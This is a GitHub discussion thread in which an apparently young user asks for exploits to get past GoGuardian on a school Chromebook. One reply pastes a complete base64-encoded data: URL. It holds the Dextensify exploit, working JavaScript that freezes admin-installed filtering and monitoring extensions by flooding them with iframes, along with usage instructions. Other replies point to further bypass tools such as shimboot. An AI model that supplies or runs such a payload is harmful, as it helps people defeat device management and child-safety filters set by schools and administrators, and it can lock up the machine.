### DISCUSSION TITLE
I require a exploit (LTMEAT and ExtHang3r do not work)

### DISCUSSION THREAD

**Discussion by ghost** [3kh0/ext-remover#1291] [Help JOIN TITANIUM NETWORK TO SHARE PLEASE]
I need help on unblocking my Chromebook. some exploits are confusing and some don't even work. Bobby Boi I'm sorry but ext han3er doesn't work and letmeat flood too. :( Can u guys give me some exploits I can use? I wanna  play arras.io!

**Comment by ghost** [comment]
Thank you for your service

**Comment by ghost** [comment]
Any ideas would help!

**Comment by ghost** [comment]
I also have goguardian. I HEARD THEY FREKIN REBOOTED IT AND NOW ITS GOGUARDIAN MONSTER. LIKE BRO WHEN I EVEN PUT IN THE SEARCH BAR ARRAS.IO IT SAYS RESTRCTED BEFORE I DO NYTHING LOL

**Reply by Luigi-Master** [reply]
ok, exthang3r can disable extensions temporarily for 30 min and its compatible with go guardian, are you forgetting to flip the allow access for url file switch or is the extension not on the list for you, also make sure to check if another extension is blocking you other than go guardian or if your managed network is. I also forgot to mention to try dextensify, copy and paste this url and follow the instructions. 

data:text/html;base64,PCFkb2N0eXBlIGh0bWw+PGh0bWwgbGFuZz1lbj48dGl0bGU+RGV4dGVuc2lmeTwvdGl0bGU+PG1ldGEgY2hhcnNldD11dGYtOD48bWV0YSBjb250ZW50PXdpZHRoPWRldmljZS13aWR0aCBuYW1lPXZpZXdwb3J0PjxzdHlsZT4qe2NvbG9yOiNkNGQzZGE7Zm9udC1mYW1pbHk6c2Fucy1zZXJpZn1he2NvbG9yOiM2ZGFlYmR9YTpob3Zlcntjb2xvcjojNGY5ZWIwfXByZSxjb2Rle2JhY2tncm91bmQtY29sb3I6IzFlMjMyNDtwYWRkaW5nOjRweDtmb250LWZhbWlseTptb25vc3BhY2U7b3ZlcmZsb3cteDphdXRvfXByZXtwYWRkaW5nOjhweH1wcmUgY29kZXtiYWNrZ3JvdW5kLWNvbG9yOiMwMDAwO2JvcmRlcjpub25lO3BhZGRpbmc6MH1ib2R5e2JhY2tncm91bmQtY29sb3I6IzFlMjMyNDt3aWR0aDoxMDAlO2hlaWdodDoxMDAlO21hcmdpbjowfWJ1dHRvbntiYWNrZ3JvdW5kLWNvbG9yOiMzMzYyNmM7Ym9yZGVyOiMwMDAwO3BhZGRpbmc6NnB4IDhweDtmb250LXNpemU6MTVweH0jbWFpbl9kaXZ7b2JqZWN0LWZpdDpjb250YWluO2JhY2tncm91bmQtY29sb3I6IzI1MmIyZDttYXgtd2lkdGg6ODAwcHg7bWFyZ2luOjE2cHggYXV0bztwYWRkaW5nOjRweCAxNnB4fSNidXR0b25zX2NvbnRhaW5lcntmbGV4LXdyYXA6d3JhcDtnYXA6OHB4O2Rpc3BsYXk6ZmxleH08L3N0eWxlPjxzY3JpcHQ+dmFyIGJ1dHRvbl9oYW5kbGVyPShhPT57bGV0IGI9IWNvbmZpcm0oYEFmdGVyIGhpdHRpbmcgT0ssIHRoZXJlIHdpbGwgYmUgYSA1IHNlY29uZCBkZWxheSB1bnRpbCB0aGUgZXh0ZW5zaW9uIHN0YXJ0cyBiZWluZyBmcm96ZW4uIFN3aXRjaCB0byBhbm90aGVyIHRhYiBpbW1lZGlhdGVseSB0byBwcmV2ZW50IHRoZSBlbnRpcmUgZGV2aWNlIGZyb20gbG9ja2luZyB1cC5gKTtpZihiKXJldHVybjtzZXRUaW1lb3V0KCgpPT57Y3JlYXRlX2lmcmFtZXMoYSl9LDUwMDApfSk7dmFyIGRldGVjdF9leHRlbnNpb25zPShhc3luYygpPT57bGV0IGE9W107Zm9yKGxldCBiIG9mIE9iamVjdC52YWx1ZXMoZXh0ZW5zaW9ucykpe2xldCBjPWF3YWl0IGNoZWNrX3VybChiLnVybCk7aWYoYyl7YS5wdXNoKGIpfX07cmV0dXJuIGF9KTt2YXIgY3JlYXRlX2lmcmFtZXM9KGE9PntsZXQgZj0wLGU9YGlmcmFtZWA7bGV0IGI9W107bGV0IGM9NTtsZXQgZD1hLnVybDt3aGlsZSghMCl7bGV0IGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudChlKTtkb2N1bWVudC5ib2R5LmFwcGVuZChhKTtiLnB1c2goYSk7Zm9yKGxldCBiPWY7Yjw1MDtiKyspe2xldCBiPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoZSk7Yi5zcmM9ZDtiLnN0eWxlLndpZHRoPWIuc3R5bGUuaGVpZ2h0PWAxcHhgO2EuY29udGVudERvY3VtZW50LmJvZHkuYXBwZW5kKGIpfTt3aGlsZShiLmxlbmd0aD5NYXRoLm1heCgzLDEwLSBjKSl7YltmXS5yZW1vdmUoKTtiLnNoaWZ0KCl9O2MrK319KTt2YXIgY2hlY2tfdXJsPShhc3luYyhhKT0+e2xldCBiPW5ldyBBYm9ydENvbnRyb2xsZXIoKTtsZXQgYz1zZXRUaW1lb3V0KCgpPT5iLmFib3J0KCksNTAwKTt0cnl7YXdhaXQgZmV0Y2goYSx7c2lnbmFsOmIuc2lnbmFsfSk7cmV0dXJuICEwfWNhdGNoKGEpe2xldCBiPWErIGBgO3JldHVybiBiLmluY2x1ZGVzKGBBYm9ydEVycm9yYCl9fSk7dmFyIG1haW49KGFzeW5jKCk9PntsZXQgYT1hd2FpdCBkZXRlY3RfZXh0ZW5zaW9ucygpO2xldCBiPWZyb21faWQoYGJ1dHRvbnNfY29udGFpbmVyYCk7aWYoIXdpbmRvdy5jaHJvbWUpe2IuaW5uZXJIVE1MPWA8cD48Yj5FcnJvcjogWW91IGFyZSBub3QgcnVubmluZyBhIENocm9taXVtLWJhc2VkIGJyb3dzZXIuPC9iPjwvcD5gO3JldHVybn1lbHNlIGlmKGEubGVuZ3RoPT09MCl7Yi5pbm5lckhUTUw9YDxwPjxiPkVycm9yOiBObyBzdXBwb3J0ZWQgZXh0ZW5zaW9ucyBkZXRlY3RlZC48L2I+PC9wPmA7Yi5pbm5lckhUTUwrPWA8cCBzdHlsZT0ibWFyZ2luLXRvcDogLTE2cHg7Ij5JZiB5b3Ugd2FudCBzdXBwb3J0IGZvciBhIHNwZWNpZmljIGV4dGVuc2lvbiBhZGRlZCwgcGxlYXNlIG1ha2UgYW4gaXNzdWUgb24gdGhlIDxhIGhyZWY9Imh0dHBzOi8vZ2l0aHViLmNvbS9hZGluZzIyMTAvZGV4dGVuc2lmeSI+R2l0aHViIHJlcG9zaXRvcnk8L2E+LCBhbmQgcHJvdmlkZSB0aGUgZXh0ZW5zaW9uIElEIGFuZCBtYW5pZmVzdC48L3A+YDtyZXR1cm59ZWxzZXtiLmlubmVySFRNTD1gYH07Zm9yKGxldCBjIG9mIGEpe2xldCBhPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoYGJ1dHRvbmApO2EuaW5uZXJUZXh0PWBGcmVlemUgJHtjLm5hbWV9YDthLm9uY2xpY2s9KCk9PntidXR0b25faGFuZGxlcihjKX07Yi5hcHBlbmQoYSl9fSk7bGV0IGZyb21faWQ9YT0+ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoYSk7bGV0IGV4dGVuc2lvbnM9eyJzZWN1cmx5X25ldyI6e25hbWU6YFNlY3VybHlgLHVybDpgY2hyb21lLWV4dGVuc2lvbjovL2pvZmxta2NjaWJrb29wbGFlb2luZWNqYm1kZWJnbGFiL2ZvbnRzL01ldHJvcG9saXMuY3NzYH0sInNlY3VybHlfb2xkIjp7bmFtZTpgU2VjdXJseSAob2xkKWAsdXJsOmBjaHJvbWUtZXh0ZW5zaW9uOi8vaWhlb2JhZ2prZmtsbmxpa2dpaGFubGhjZGRqb2loa2cvZm9udHMvTWV0cm9wb2xpcy5jc3NgfSwiZ29ndWFyZGlhbiI6e25hbWU6YEdvZ3VhcmRpYW5gLHVybDpgY2hyb21lLWV4dGVuc2lvbjovL2hhbGRsZ2xkcGxnbmdna2phYWZoZWxnaWFnbGFmYW5oL3lvdXR1YmVfaW5qZWN0aW9uLmpzYH0sImxhbnNjaG9vbCI6e25hbWU6YExBTlNjaG9vbGAsdXJsOmBjaHJvbWUtZXh0ZW5zaW9uOi8vYmFsZWlvam5qcGdlb2pvaGhoZmJpY2hjb2RnbGptbmovYmxvY2tlZC5odG1sYH0sImxpbmV3aXplIjp7bmFtZTpgTGluZXdpemVgLHVybDpgY2hyb21lLWV4dGVuc2lvbjovL2RkZmJraHBtY2RiY2llamVuZmNvbGFhaWVibmpjYmZjL2JhY2tncm91bmQvYXNzZXRzL3BhZ2VzL2RlZmF1bHQtYmxvY2tlZC5odG1sYH0sImJsb2Nrc2kiOntuYW1lOmBCbG9ja3NpYCx1cmw6YGNocm9tZS1leHRlbnNpb246Ly9naGxwbWxkbWpqaG1kZ21uZW9haWJiZWdrampib25iay9wYWdlcy9ibG9ja1BhZ2UuaHRtbGB9LCJmb3J0aWd1YXJkIjp7bmFtZTpgRm9ydGlndWFyZGAsdXJsOmBjaHJvbWUtZXh0ZW5zaW9uOi8vaWdiZ3BlaG5ibWhnZGdqYmhra3BlZG9tbWdtZmJlYW8veW91dHViZV9pbmplY3Rpb24uanNgfSwiY2lzY28iOntuYW1lOmBDaXNjbyBVbWJyZWxsYWAsdXJsOmBjaHJvbWUtZXh0ZW5zaW9uOi8vamNkaG1vamZlY2pmbWJkcGNoaWhiZWlsb2hnbmJkY2kvYmxvY2tlZC5odG1sYH0sImNvbnRlbnRrZWVwZXIiOntuYW1lOmBDb250ZW50S2VlcGVyYCx1cmw6YGNocm9tZS1leHRlbnNpb246Ly9qZG9ncGhha29uZGZkbWNhbnBhcGZhaGtkb21haWNmYS9pbWcvY2thdXRoMTl4LnBuZ2B9LCJjb250ZW50a2VlcGVyZzMiOntuYW1lOmBDSy1BdXRoZW50aWNhdG9yIEczYCx1cmw6YGNocm9tZS1leHRlbnNpb246Ly9vZG9hbnBub25pbG9nb2ZnZ2FvaGhrZGtkZ2JoZGxqcC9pbWcvY2thdXRoMTl4LnBuZ2B9LCJzZWN1cmx5Y2xhc3Nyb29tIjp7bmFtZTpgU2VjdXJseSBDbGFzc3Jvb21gLHVybDpgY2hyb21lLWV4dGVuc2lvbjovL2pmYmVjZm1pZWdjamRkZW5qaGxiaGxpa2NiZm1uYWZkL25vdGZvdW5kLmh0bWxgfSwiaGFwYXJhIjp7bmFtZTpgSGFwYXJhYCx1cmw6YGNocm9tZS1leHRlbnNpb246Ly9rYm9oYWZjb3BmcGlna2pkaW1kY2RnZW5saGttaGJuYy9ibG9ja2VkLmh0bWxgfSwiaGFwYXJhLW5ldy1pZCI6e25hbWU6YEhhcGFyYWAsdXJsOmBjaHJvbWUtZXh0ZW5zaW9uOi8vYWNlb3BhY2dhZXBkY2Vsb2hvYmljcGZmYmJlam5mYWMvYmxvY2tlZC5odG1sYH0sImlib3NzIjp7bmFtZTpgaWJvc3NgLHVybDpgY2hyb21lLWV4dGVuc2lvbjovL2ttZmZlaGJpZGxhbGliZmVrbGFlZm5ja3BpZGJvZGZmL3Jlc3RyaWN0ZWQuaHRtbGB9LCJsaWdodHNwZWVkZmlsdGVyYWdlbnQiOntuYW1lOmBMaWdodHNwZWVkIEZpbHRlciBBZ2VudGAsdXJsOmBjaHJvbWUtZXh0ZW5zaW9uOi8vYWRrY3BrcGdoYWhtYm9wa2pjaG9iaWVja2VvYW9lZW0vaWNvbi0xMjgucG5nYH0sImxpZ2h0c3BlZWRjbGFzc3Jvb20iOntuYW1lOmBMaWdodHNwZWVkIENsYXNzcm9vbWAsdXJsOmBjaHJvbWUtZXh0ZW5zaW9uOi8va2tibWRnamdnY2RhamNrZGxibmdkam9ucGNocGFpZWEvYXNzZXRzL2ljb24tY2xhc3Nyb29tLTEyOC5wbmdgfSwiaW50ZXJjbGFzcyI6e25hbWU6YEludGVyQ0xBU1MgRmlsdGVyaW5nIFNlcnZpY2VgLHVybDpgY2hyb21lLWV4dGVuc2lvbjovL2piZGRnamdsZ2trbmVvbm5pbmVhb2hkaGFiamJnb3BpL3BhZ2VzL21lc3NhZ2UtcGFnZS5odG1sYH0sImludGVyc2FmZSI6e25hbWU6YEludGVyU2FmZSBHYXRld2F5Q29ubmVjdGlvbiBBZ2VudGAsdXJsOmBjaHJvbWUtZXh0ZW5zaW9uOi8vZWNqb2doY2NuamxvZGpsbWtnbW5ibmtkY2JuamdkZW4vcmVzb3VyY2VzL29wdGlvbnMuanNgfSwibG9pbG8iOntuYW1lOmDjg63jgqTjg61XZWLjg5XjgqPjg6vjgr/jg7wvTG9pTG8gV2ViIEZpbHRlcnNgLHVybDpgY2hyb21lLWV4dGVuc2lvbjovL3BhYmpsYmpjZ2xkbmRucGpub2tqYWtiZG9mamduZmlhL2ltYWdlL2FsbG93X2ljb24vc2hpZWxkX2dyZWVuXzEyOHgxMjgucG5nYH0sImdvcGhlcl9idWRkeSI6e25hbWU6YEdvcGhlciBCdWRkeWAsdXJsOmBjaHJvbWUtZXh0ZW5zaW9uOi8vY2diYmJqbWdkcG5pZmlqY29uaGFtZ2dqZWhsYW1jaWYvaW1hZ2VzL2dvcGhlci1idWRkeV8xMjh4MTI4X2NvbG9yLnBuZ2B9LCJsYW5zY2hvb2xfaGVscGVyIjp7bmFtZTpgTGFuU2Nob29sIFdlYiBIZWxwZXJgLHVybDpgY2hyb21lLWV4dGVuc2lvbjovL2hvbmpjbmVmZWtmbm9tcGFtcGNwbWNkYWRpYm1qaGxrL2Jsb2NrZWQuaHRtbGB9LCJpbXRsYXphcnVzIjp7bmFtZTpgSU1UTGF6YXJ1c2AsdXJsOmBjaHJvbWUtZXh0ZW5zaW9uOi8vY2dpZ29wamFra2VjbGhnZ2NoZ25obXBtaGdoY2JuYWYvbW9kZWxzL21vZGVsLmpzb25gfSwiaW1wZXJvX2JhY2tkcm9wIjp7bmFtZTpgSW1wZXJvIEJhY2tkcm9wYCx1cmw6YGNocm9tZS1leHRlbnNpb246Ly9qanBtamNjcGVtbGxubWdpYW9qYW9jZ25ha3BtZmdqZy9saWNlbnNlcy5odG1sYH0sIm1vYmlsZV9ndWFyZGlhbiI6e25hbWU6YE1vYmlsZSBHdWFyZGlhbmAsdXJsOmBjaHJvbWUtZXh0ZW5zaW9uOi8vZmdtYWZoZG9oamtkaGZhYWNnYmdjbG1mZ2tnb2tnbWIvYmxvY2suaHRtbGB9fTt3aW5kb3cub25sb2FkPW1haW48L3NjcmlwdD48Ym9keT48ZGl2IGlkPW1haW5fZGl2PjxoMSBzdHlsZT1tYXJnaW4tdG9wOjhweD5EZXh0ZW5zaWZ5PC9oMT48cD5EZXh0ZW5zaWZ5IGlzIGFuIGV4cGxvaXQgd2hpY2ggbGV0cyB5b3UgZGlzYWJsZSBtb3N0IGFkbWluLWluc3RhbGxlZCBDaHJvbWUgZXh0ZW5zaW9ucyBmcm9tIGFueSB3ZWJwYWdlLjxoMj5JbnN0cnVjdGlvbnM8L2gyPjxvbD48bGk+T3BlbiBjaHJvbWU6Ly9leHRlbnNpb25zIGluIGEgbmV3IHRhYi4gS2VlcCB0aGlzIHBhZ2Ugb3Blbi48bGk+R28gdG8gdGhlIHNldHRpbmdzIHBhZ2UgZm9yIHRoZSBleHRlbnNpb24geW91IHdhbnQgdG8gZGlzYWJsZS48bGk+T24gdGhlIERleHRlbnNpZnkgcGFnZSwgY2xpY2sgdGhlICJmcmVlemUgZXh0ZW5zaW9uIiBidXR0b24uIEltbWVkaWF0ZWx5IHN3aXRjaCBiYWNrIHRvIHRoZSBjaHJvbWU6Ly9leHRlbnNpb25zIHRhYi48bGk+QmFjayBvbiB0aGUgY2hyb21lOi8vZXh0ZW5zaW9ucyBwYWdlLCBzcGFtIHRoZSAiYWxsb3cgYWNjZXNzIHRvIGZpbGUgVVJMcyIgc3dpdGNoIGZvciBhIGZldyBzZWNvbmRzLjxsaT5UaGUgZXh0ZW5zaW9uIHNob3VsZCBub3cgYmUgdGVtcG9yYXJpbHkgZGlzYWJsZWQuIEZvciB0aGlzIGVmZmVjdCB0byBwZXJzaXN0LCBmbGlwIHRoZSAiYWxsb3cgYWNjZXNzIHRvIGZpbGUgVVJMcyIgYWdhaW4gZXZlcnkgZmV3IG1pbnV0ZXMsIG9yIGlmIHBhZ2VzIHN0YXJ0IGdldHRpbmcgYmxvY2tlZCBhZ2Fpbi48bGk+WW91IG1heSBhbHNvIG5lZWQgdG8gcmVvcGVuIHRoaXMgcGFnZSBldmVyeSBvbmNlIGluIGEgd2hpbGUgdG8gcHJldmVudCBhbiB1bmF2b2lkYWJsZSBtZW1vcnkgbGVhayBmcm9tIGNyYXNoaW5nIHRoZSBzeXN0ZW0uPC9vbD48cD5EdXJpbmcgdGhpcyBwcm9jZXNzLCB5b3VyIENocm9tZWJvb2sgbWF5IGhhbmcgbW9tZW50YXJpbHkuIFRoaXMgaXMgbm9ybWFsLCBhbmQgaXQgc2hvdWxkIHJlc29sdmUgaXRzZWxmIGFmdGVyIGEgZmV3IHNlY29uZHMuPGRpdiBpZD1idXR0b25zX2NvbnRhaW5lcj48cD48aT5EZXRlY3RpbmcgZXh0ZW5zaW9ucy4uLjwvaT48L2Rpdj48YnI+PGhyPjxkZXRhaWxzPjxzdW1tYXJ5IHN0eWxlPW1hcmdpbi1ib3R0b206OHB4Pk1hZGUgYnkgPGEgaHJlZj1odHRwczovL2FkaW5nLmRldiB0YXJnZXQ9X2JsYW5rPmFkaW5nMjIxMDwvYT4uIFRoaXMgZmlsZSBpcyBsaWNlbnNlZCB1bmRlciB0aGUgTUlUIGxpY2Vuc2UuPC9zdW1tYXJ5PiA8cHJlPk1JVCBMaWNlbnNlCkNvcHlyaWdodCAoYykgMjAyMyBhZGluZzIyMTAKClBlcm1pc3Npb24gaXMgaGVyZWJ5IGdyYW50ZWQsIGZyZWUgb2YgY2hhcmdlLCB0byBhbnkgcGVyc29uIG9idGFpbmluZyBhIGNvcHkKb2YgdGhpcyBzb2Z0d2FyZSBhbmQgYXNzb2NpYXRlZCBkb2N1bWVudGF0aW9uIGZpbGVzICh0aGUgIlNvZnR3YXJlIiksIHRvIGRlYWwKaW4gdGhlIFNvZnR3YXJlIHdpdGhvdXQgcmVzdHJpY3Rpb24sIGluY2x1ZGluZyB3aXRob3V0IGxpbWl0YXRpb24gdGhlIHJpZ2h0cwp0byB1c2UsIGNvcHksIG1vZGlmeSwgbWVyZ2UsIHB1Ymxpc2gsIGRpc3RyaWJ1dGUsIHN1YmxpY2Vuc2UsIGFuZC9vciBzZWxsCmNvcGllcyBvZiB0aGUgU29mdHdhcmUsIGFuZCB0byBwZXJtaXQgcGVyc29ucyB0byB3aG9tIHRoZSBTb2Z0d2FyZSBpcwpmdXJuaXNoZWQgdG8gZG8gc28sIHN1YmplY3QgdG8gdGhlIGZvbGxvd2luZyBjb25kaXRpb25zOgoKVGhlIGFib3ZlIGNvcHlyaWdodCBub3RpY2UgYW5kIHRoaXMgcGVybWlzc2lvbiBub3RpY2Ugc2hhbGwgYmUgaW5jbHVkZWQgaW4gYWxsCmNvcGllcyBvciBzdWJzdGFudGlhbCBwb3J0aW9ucyBvZiB0aGUgU29mdHdhcmUuCgpUSEUgU09GVFdBUkUgSVMgUFJPVklERUQgIkFTIElTIiwgV0lUSE9VVCBXQVJSQU5UWSBPRiBBTlkgS0lORCwgRVhQUkVTUyBPUgpJTVBMSUVELCBJTkNMVURJTkcgQlVUIE5PVCBMSU1JVEVEIFRPIFRIRSBXQVJSQU5USUVTIE9GIE1FUkNIQU5UQUJJTElUWSwKRklUTkVTUyBGT1IgQSBQQVJUSUNVTEFSIFBVUlBPU0UgQU5EIE5PTklORlJJTkdFTUVOVC4gSU4gTk8gRVZFTlQgU0hBTEwgVEhFCkFVVEhPUlMgT1IgQ09QWVJJR0hUIEhPTERFUlMgQkUgTElBQkxFIEZPUiBBTlkgQ0xBSU0sIERBTUFHRVMgT1IgT1RIRVIKTElBQklMSVRZLCBXSEVUSEVSIElOIEFOIEFDVElPTiBPRiBDT05UUkFDVCwgVE9SVCBPUiBPVEhFUldJU0UsIEFSSVNJTkcgRlJPTSwKT1VUIE9GIE9SIElOIENPTk5FQ1RJT04gV0lUSCBUSEUgU09GVFdBUkUgT1IgVEhFIFVTRSBPUiBPVEhFUiBERUFMSU5HUyBJTiBUSEUKU09GVFdBUkUuPC9wcmU+IDxwIHN0eWxlPXRleHQtYWxpZ246cmlnaHQ7Zm9udC1zaXplOjEzcHg+PGk+VmVyc2lvbiAxLjEuMjwvaT48L3A+PC9kZXRhaWxzPjwvZGl2Pg==

**Reply by ghost** [reply]
Thx

**Reply by ghost** [reply]
Im try it out

**Reply by ghost** [reply]
nope I tryed it and it lasts only 7 mins

**Reply by nathblade16** [reply]
> nope I tryed it and it lasts only 7 mins

whats your chromeOS version

**Reply by ghost** [reply]
how do I check?

**Reply by nathblade16** [reply]
> how do I check?

the safest way (without an update) is chrome://version

**Comment by nathblade16** [comment]
my advice is shimboot

**Comment by ghost** [comment]
How do I check my chrome version

**Comment by ghost** [comment]
you mean I'm on 130

**Reply by nathblade16** [reply]
are you saying your on 130 or are you asking if I'm asking if your on 130???

**Comment by ghost** [comment]
I am on 130

**Reply by nathblade16** [reply]
ok, there aren't really much exploits for 130 and I would either just put up with it until one is found or try shimboot

**Reply by nathblade16** [reply]
you could probably try goaway though

**Reply by ghost** [reply]
how do u do shimboot or goaway

**Reply by nathblade16** [reply]
read the readme of this repo for instructions

**Reply by ghost** [reply]
ok

**Comment by ghost** [comment]
wait where?

**Reply by nathblade16** [reply]
on this repo, code tab

**Reply by ghost** [reply]
Whaddya mean

**Reply by ghost** [reply]
repo?

**Reply by nathblade16** [reply]
https://github.com/3kh0/ext-remover

**Reply by ghost** [reply]
and then?

**Reply by nathblade16** [reply]
scroll a bit and you find exploits

**Reply by ghost** [reply]
Thx

**Comment by ghost** [comment]
Hello?

**Comment by IGETboard** [comment]
What blocker are you using?

**Reply by ghost** [reply]
waddy mean?

**Comment by ghost** [comment]
u mean my school BLOCKER its goguardian
